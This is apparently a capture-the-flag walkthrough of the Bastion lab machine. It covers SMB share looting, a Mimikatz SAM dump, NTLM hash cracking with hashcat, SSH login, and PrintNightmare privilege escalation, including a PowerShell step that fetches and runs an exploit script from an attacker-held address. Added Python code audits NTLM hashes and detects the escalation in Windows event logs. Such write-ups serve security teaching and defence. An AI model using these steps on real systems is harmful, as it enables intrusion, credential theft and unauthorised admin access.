Overview
Walkthrough
Recon
nmap
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey:
| 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3bG3TRRwV6dlU1lPbviOW+3fBC7wab+KSQ0Gyhvf9Z1OxFh9v5e6GP4rt5Ss76ic1oAJPIDvQwGlKdeUEnjtEtQXB/78Ptw6IPPPPwF5dI1W4GvoGR4MV5Q6CPpJ6HLIJdvAcn3isTCZgoJT69xRK0ymPnqUqaB+/ptC4xvHmW9ptHdYjDOFLlwxg17e7Sy0CA67PW/nXu7+OKaIOx0lLn8QPEcyrYVCWAqVcUsgNNAjR4h1G7tYLVg3SGrbSmIcxlhSMexIFIVfR37LFlNIYc6Pa58lj2MSQLusIzRoQxaXO4YSp/dM1tk7CN2cKx1PTd9VVSDH+/Nq0HCXPiYh3
| 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBF1Mau7cS9INLBOXVd4TXFX/02+0gYbMoFzIayeYeEOAcFQrAXa1nxhHjhfpHXWEj2u0Z/hfPBzOLBGi/ngFRUg=
| 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIB34X2ZgGpYNXYb+KLFENmf0P0iQ22Q0sjws2ATjFsiN
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack Windows Server 2016 Standard 14393 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Enumerating SMB Shares
OldBoxes/bastian → smbclient -L \\\\10.10.10.134 -U 'anonymouse' -N
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
Backups Disk
C$ Disk Default share
IPC$ IPC Remote IPC
bastian/dump → smbclient \\\\10.10.10.134\\backups -U 'anonymouse' -N
Try "help" to get a list of possible commands.
smb: \> recurse on
smb: \> prompt off
smb: \> timeout 1000000
io_timeout per operation is now 1000000
smb: \> mget *
Enumerating the Windows Hard Disk
Run Mimikatz against the SAM and SYSTEM hives taken from the downloaded VHD to find the user L4mpje and recover the account's NTLM hash:
NTLM hash: 26112010952d963c8dc4217daec986d9
mimikatz # lsadump::sam /system:SYSTEM /sam:SAM
Domain : L4MPJE-PC
SysKey : 8b56b2cb5033d8e2e289c26f8939a25f
Local SID : S-1-5-21-18827714-3633218324-154007371
SAMKey : 335e6c10b1dce6433e9ef82d30f49d3a
RID : 000001f4 (500)
User : Administrator
Hash NTLM: 31d6cfe0d16ae931b73c59d7e0c089c0
RID : 000001f5 (501)
User : Guest
RID : 000003e8 (1000)
User : L4mpje
Hash NTLM: 26112010952d963c8dc4217daec986d9
Then crack it using hashcat (mode 1000 is NTLM):
bastian/dump → hashcat -a 0 -m 1000 l4mpje-ntlm /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...
....
26112010952d963c8dc4217daec986d9:bureaulampje
Session..........: hashcat
Status...........: Cracked
Hash.Name........: NTLM
Hash.Target......: 26112010952d963c8dc4217daec986d9
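The hash cracks this quickly because NTLM is nothing more than an unsalted MD4 digest of the UTF-16LE password, so a single dictionary word is one hash computation away. The Python below is an added example, not code from this write-up, from Mimikatz or from hashcat: it implements MD4/NTLM from scratch so a candidate password can be checked against a dumped hash offline, parses the `lsadump::sam` output shown above (embedded here as the sample input), and flags any account whose stored hash is the hash of the empty password. The Administrator entry in that dump (`31d6cfe0...`) is exactly that empty-password hash, which is the kind of finding a defender wants out of a SAM audit. The parser and `audit_sam_dump` are my own and assume the Mimikatz output layout shown above.

```python
import re
import struct

MASK32 = 0xFFFFFFFF
BLANK_NTLM = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NTLM (MD4 of "") for an empty password


def _lrot(x: int, n: int) -> int:
    """Rotate a 32-bit word left by n bits."""
    return ((x << n) | (x >> (32 - n))) & MASK32


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 as in RFC 1320; NTLM is MD4 over the UTF-16LE password."""
    msg = bytearray(data)
    bit_len = (8 * len(data)) & 0xFFFFFFFFFFFFFFFF
    msg.append(0x80)                       # padding: a 1 bit, zeros to 56 mod 64,
    while len(msg) % 64 != 56:
        msg.append(0)
    msg += struct.pack("<Q", bit_len)      # then the 64-bit little-endian bit length

    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    f = lambda x, y, z: (x & y) | (~x & z)            # round 1 function
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)   # round 2 function (majority)
    h = lambda x, y, z: x ^ y ^ z                     # round 3 function
    r2_order = [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]
    r3_order = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]

    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        # Each round updates register a, then rotates the registers so the
        # next step updates what the spec calls d, then c, then b.
        for i in range(16):
            a = _lrot((a + f(b, c, d) + x[i]) & MASK32, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):
            a = _lrot((a + g(b, c, d) + x[r2_order[i]] + 0x5A827999) & MASK32,
                      (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):
            a = _lrot((a + h(b, c, d) + x[r3_order[i]] + 0x6ED9EBA1) & MASK32,
                      (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a, b, c, d = ((a + aa) & MASK32, (b + bb) & MASK32,
                      (c + cc) & MASK32, (d + dd) & MASK32)
    return struct.pack("<4I", a, b, c, d)


def ntlm_hex(password: str) -> str:
    """NTLM hash of a password as lowercase hex (no salt, no iteration)."""
    return md4(password.encode("utf-16le")).hex()


def verify_password(password: str, ntlm: str) -> bool:
    """Offline check of one candidate password against a dumped NTLM hash."""
    return ntlm_hex(password) == ntlm.lower()


# Constructed sample input: the lsadump::sam output from the write-up above.
SAM_DUMP = """\
RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: 31d6cfe0d16ae931b73c59d7e0c089c0
RID  : 000001f5 (501)
User : Guest
RID  : 000003e8 (1000)
User : L4mpje
  Hash NTLM: 26112010952d963c8dc4217daec986d9
"""


def parse_lsadump_sam(text: str) -> dict:
    """Return {username: ntlm_hex or None} from Mimikatz lsadump::sam output.

    Assumes the 'User : name' / 'Hash NTLM: hex' layout shown in the write-up;
    an account with no 'Hash NTLM' line (Guest here) maps to None.
    """
    users, current = {}, None
    for line in text.splitlines():
        m = re.match(r"\s*User\s*:\s*(\S+)", line)
        if m:
            current = m.group(1)
            users[current] = None
            continue
        m = re.match(r"\s*Hash NTLM:\s*([0-9a-fA-F]{32})", line)
        if m and current:
            users[current] = m.group(1).lower()
    return users


def audit_sam_dump(text: str) -> list:
    """Flag accounts whose stored NTLM hash is the empty-password hash."""
    return [(user, "blank password")
            for user, h in parse_lsadump_sam(text).items() if h == BLANK_NTLM]


if __name__ == "__main__":
    print(audit_sam_dump(SAM_DUMP))
    print(verify_password("bureaulampje", "26112010952d963c8dc4217daec986d9"))
```

`md4` is checked against the RFC 1320 test vectors, and `audit_sam_dump` over the dump above reports only Administrator; Guest has no hash line at all, so it is parsed as `None` rather than mis-flagged.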
Then log in over SSH as L4mpje with the cracked password:
bastian/dump → ssh L4mpje@10.10.10.134
The authenticity of host '10.10.10.134 (10.10.10.134)' can't be established.
ECDSA key fingerprint is SHA256:ILc1g9UC/7j/5b+vXeQ7TIaXLFddAbttU86ZeiM/bNY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.134' (ECDSA) to the list of known hosts.
L4mpje@10.10.10.134's password:
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
l4mpje@BASTION C:\Users\L4mpje>
l4mpje@BASTION C:\Users\L4mpje\Desktop>more user.txt
9bfe57d5c3309db3a151772f9d86c6cd
Privilege Escalation
PrintNightmare (CVE-2021-1675)
PS C:\Users\L4mpje\Videos> Invoke-WebRequest "http://10.10.14.27:9001/CVE-2021-1675.ps1"
PS C:\Users\L4mpje\Videos> . .\CVE-2021-1675.ps1
PS C:\Users\L4mpje\Videos> Invoke-Nightmare
[+] using default new user: adm1n
[+] using default new password: P@ssw0rd
[+] created payload at C:\Users\L4mpje\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_1734185bdb8f8610\Amd64\mxdwdrv.dll"
[+] added user as local administrator
[+] deleting payload from C:\Users\L4mpje\AppData\Local\Temp\nightmare.dll
PS C:\Users\L4mpje\Videos> net users
User accounts for \\BASTION
-------------------------------------------------------------------------------
adm1n Administrator DefaultAccount
Guest L4mpje
The command completed successfully.
bastian/dump → ssh adm1n@10.10.10.134
adm1n@10.10.10.134's password:
Permission denied, please try again.
adm1n@10.10.10.134's password:
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
adm1n@BASTION C:\Users\Administrator\Desktop>more root.txt
958850b91811676ed6620a9c430e65c8
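From the defender's side, every step of this escalation leaves a trace in standard Windows logs: the spooler installs a driver whose file list includes a DLL under a user profile (the `nightmare.dll` path above rather than the driver store), and moments later a new local user is created (Security event 4720) and added to Administrators (Security event 4732). Event 316 in the Microsoft-Windows-PrintService/Operational log records a printer driver being added or updated, but that log is disabled by default and has to be enabled for the first signal to exist at all. The Python below is an added example and is not part of the write-up or of the CVE-2021-1675.ps1 tool: it runs that correlation over a handful of constructed event records modelled on the output above. The record field names (`time`, `log`, `id`, `subject`, `target`, `group`, `files`) are my own simplification of exported events, and the timestamps and the `BASTION$` subject are constructed.

```python
from datetime import datetime, timedelta

# Locations where printer driver files legitimately live; anything else is suspect.
TRUSTED_DRIVER_DIRS = (
    "c:\\windows\\system32\\spool\\drivers\\",
    "c:\\windows\\system32\\driverstore\\filerepository\\",
)
ADMIN_GROUP = "Administrators"
CORRELATION_WINDOW = timedelta(minutes=10)

# Constructed sample events modelled on the write-up (not real log exports).
EVENTS = [
    {"time": "2021-07-10T12:00:01", "log": "Security", "id": 4624, "subject": "L4mpje"},
    {"time": "2021-07-10T12:00:05", "log": "Microsoft-Windows-PrintService/Operational",
     "id": 316, "subject": "L4mpje",
     "files": ["C:\\Windows\\System32\\DriverStore\\FileRepository\\"
               "ntprint.inf_amd64_1734185bdb8f8610\\Amd64\\mxdwdrv.dll",
               "C:\\Users\\L4mpje\\AppData\\Local\\Temp\\nightmare.dll"]},
    {"time": "2021-07-10T12:00:06", "log": "Security", "id": 4720,
     "subject": "BASTION$", "target": "adm1n"},
    {"time": "2021-07-10T12:00:07", "log": "Security", "id": 4732,
     "subject": "BASTION$", "target": "adm1n", "group": "Administrators"},
]


def is_untrusted_driver_file(path: str) -> bool:
    """True when a driver file sits outside the spool/driver-store directories."""
    p = path.replace("/", "\\").lower()
    return not any(p.startswith(d) for d in TRUSTED_DRIVER_DIRS)


def _t(ev: dict) -> datetime:
    return datetime.fromisoformat(ev["time"])


def detect(events: list) -> list:
    """Correlate driver installs, user creation and admin-group adds.

    Returns one finding dict per rule hit:
      untrusted-printer-driver-file  316 whose file list leaves the driver dirs
      new-user-made-admin            4720 followed by 4732 into Administrators
      printnightmare-pattern         both of the above inside CORRELATION_WINDOW
    """
    events = sorted(events, key=_t)
    findings, driver_hits = [], []

    for i, ev in enumerate(events):
        if ev["id"] == 316 and "PrintService" in ev["log"]:
            bad = [f for f in ev.get("files", []) if is_untrusted_driver_file(f)]
            if bad:
                driver_hits.append(_t(ev))
                findings.append({"rule": "untrusted-printer-driver-file",
                                 "subject": ev["subject"], "files": bad})

        if ev["id"] == 4720:
            created, new_user = _t(ev), ev["target"]
            for later in events[i + 1:]:
                if _t(later) - created > CORRELATION_WINDOW:
                    break
                if (later["id"] == 4732 and later.get("target") == new_user
                        and later.get("group") == ADMIN_GROUP):
                    findings.append({"rule": "new-user-made-admin", "user": new_user,
                                     "created_by": ev["subject"]})
                    # A driver install shortly before the new admin is the
                    # PrintNightmare shape seen in the write-up.
                    if any(timedelta(0) <= created - d <= CORRELATION_WINDOW
                           for d in driver_hits):
                        findings.append({"rule": "printnightmare-pattern",
                                         "user": new_user})
                    break
    return findings


if __name__ == "__main__":
    for finding in detect(EVENTS):
        print(finding)
```

The 4720/4732 pair alone is a useful standing alert on any server (new local accounts should be rare and made by a known admin, not by the machine account); the 316 rule needs the Operational log switched on, and the combined rule is what distinguishes this exploit chain from routine print-driver deployment.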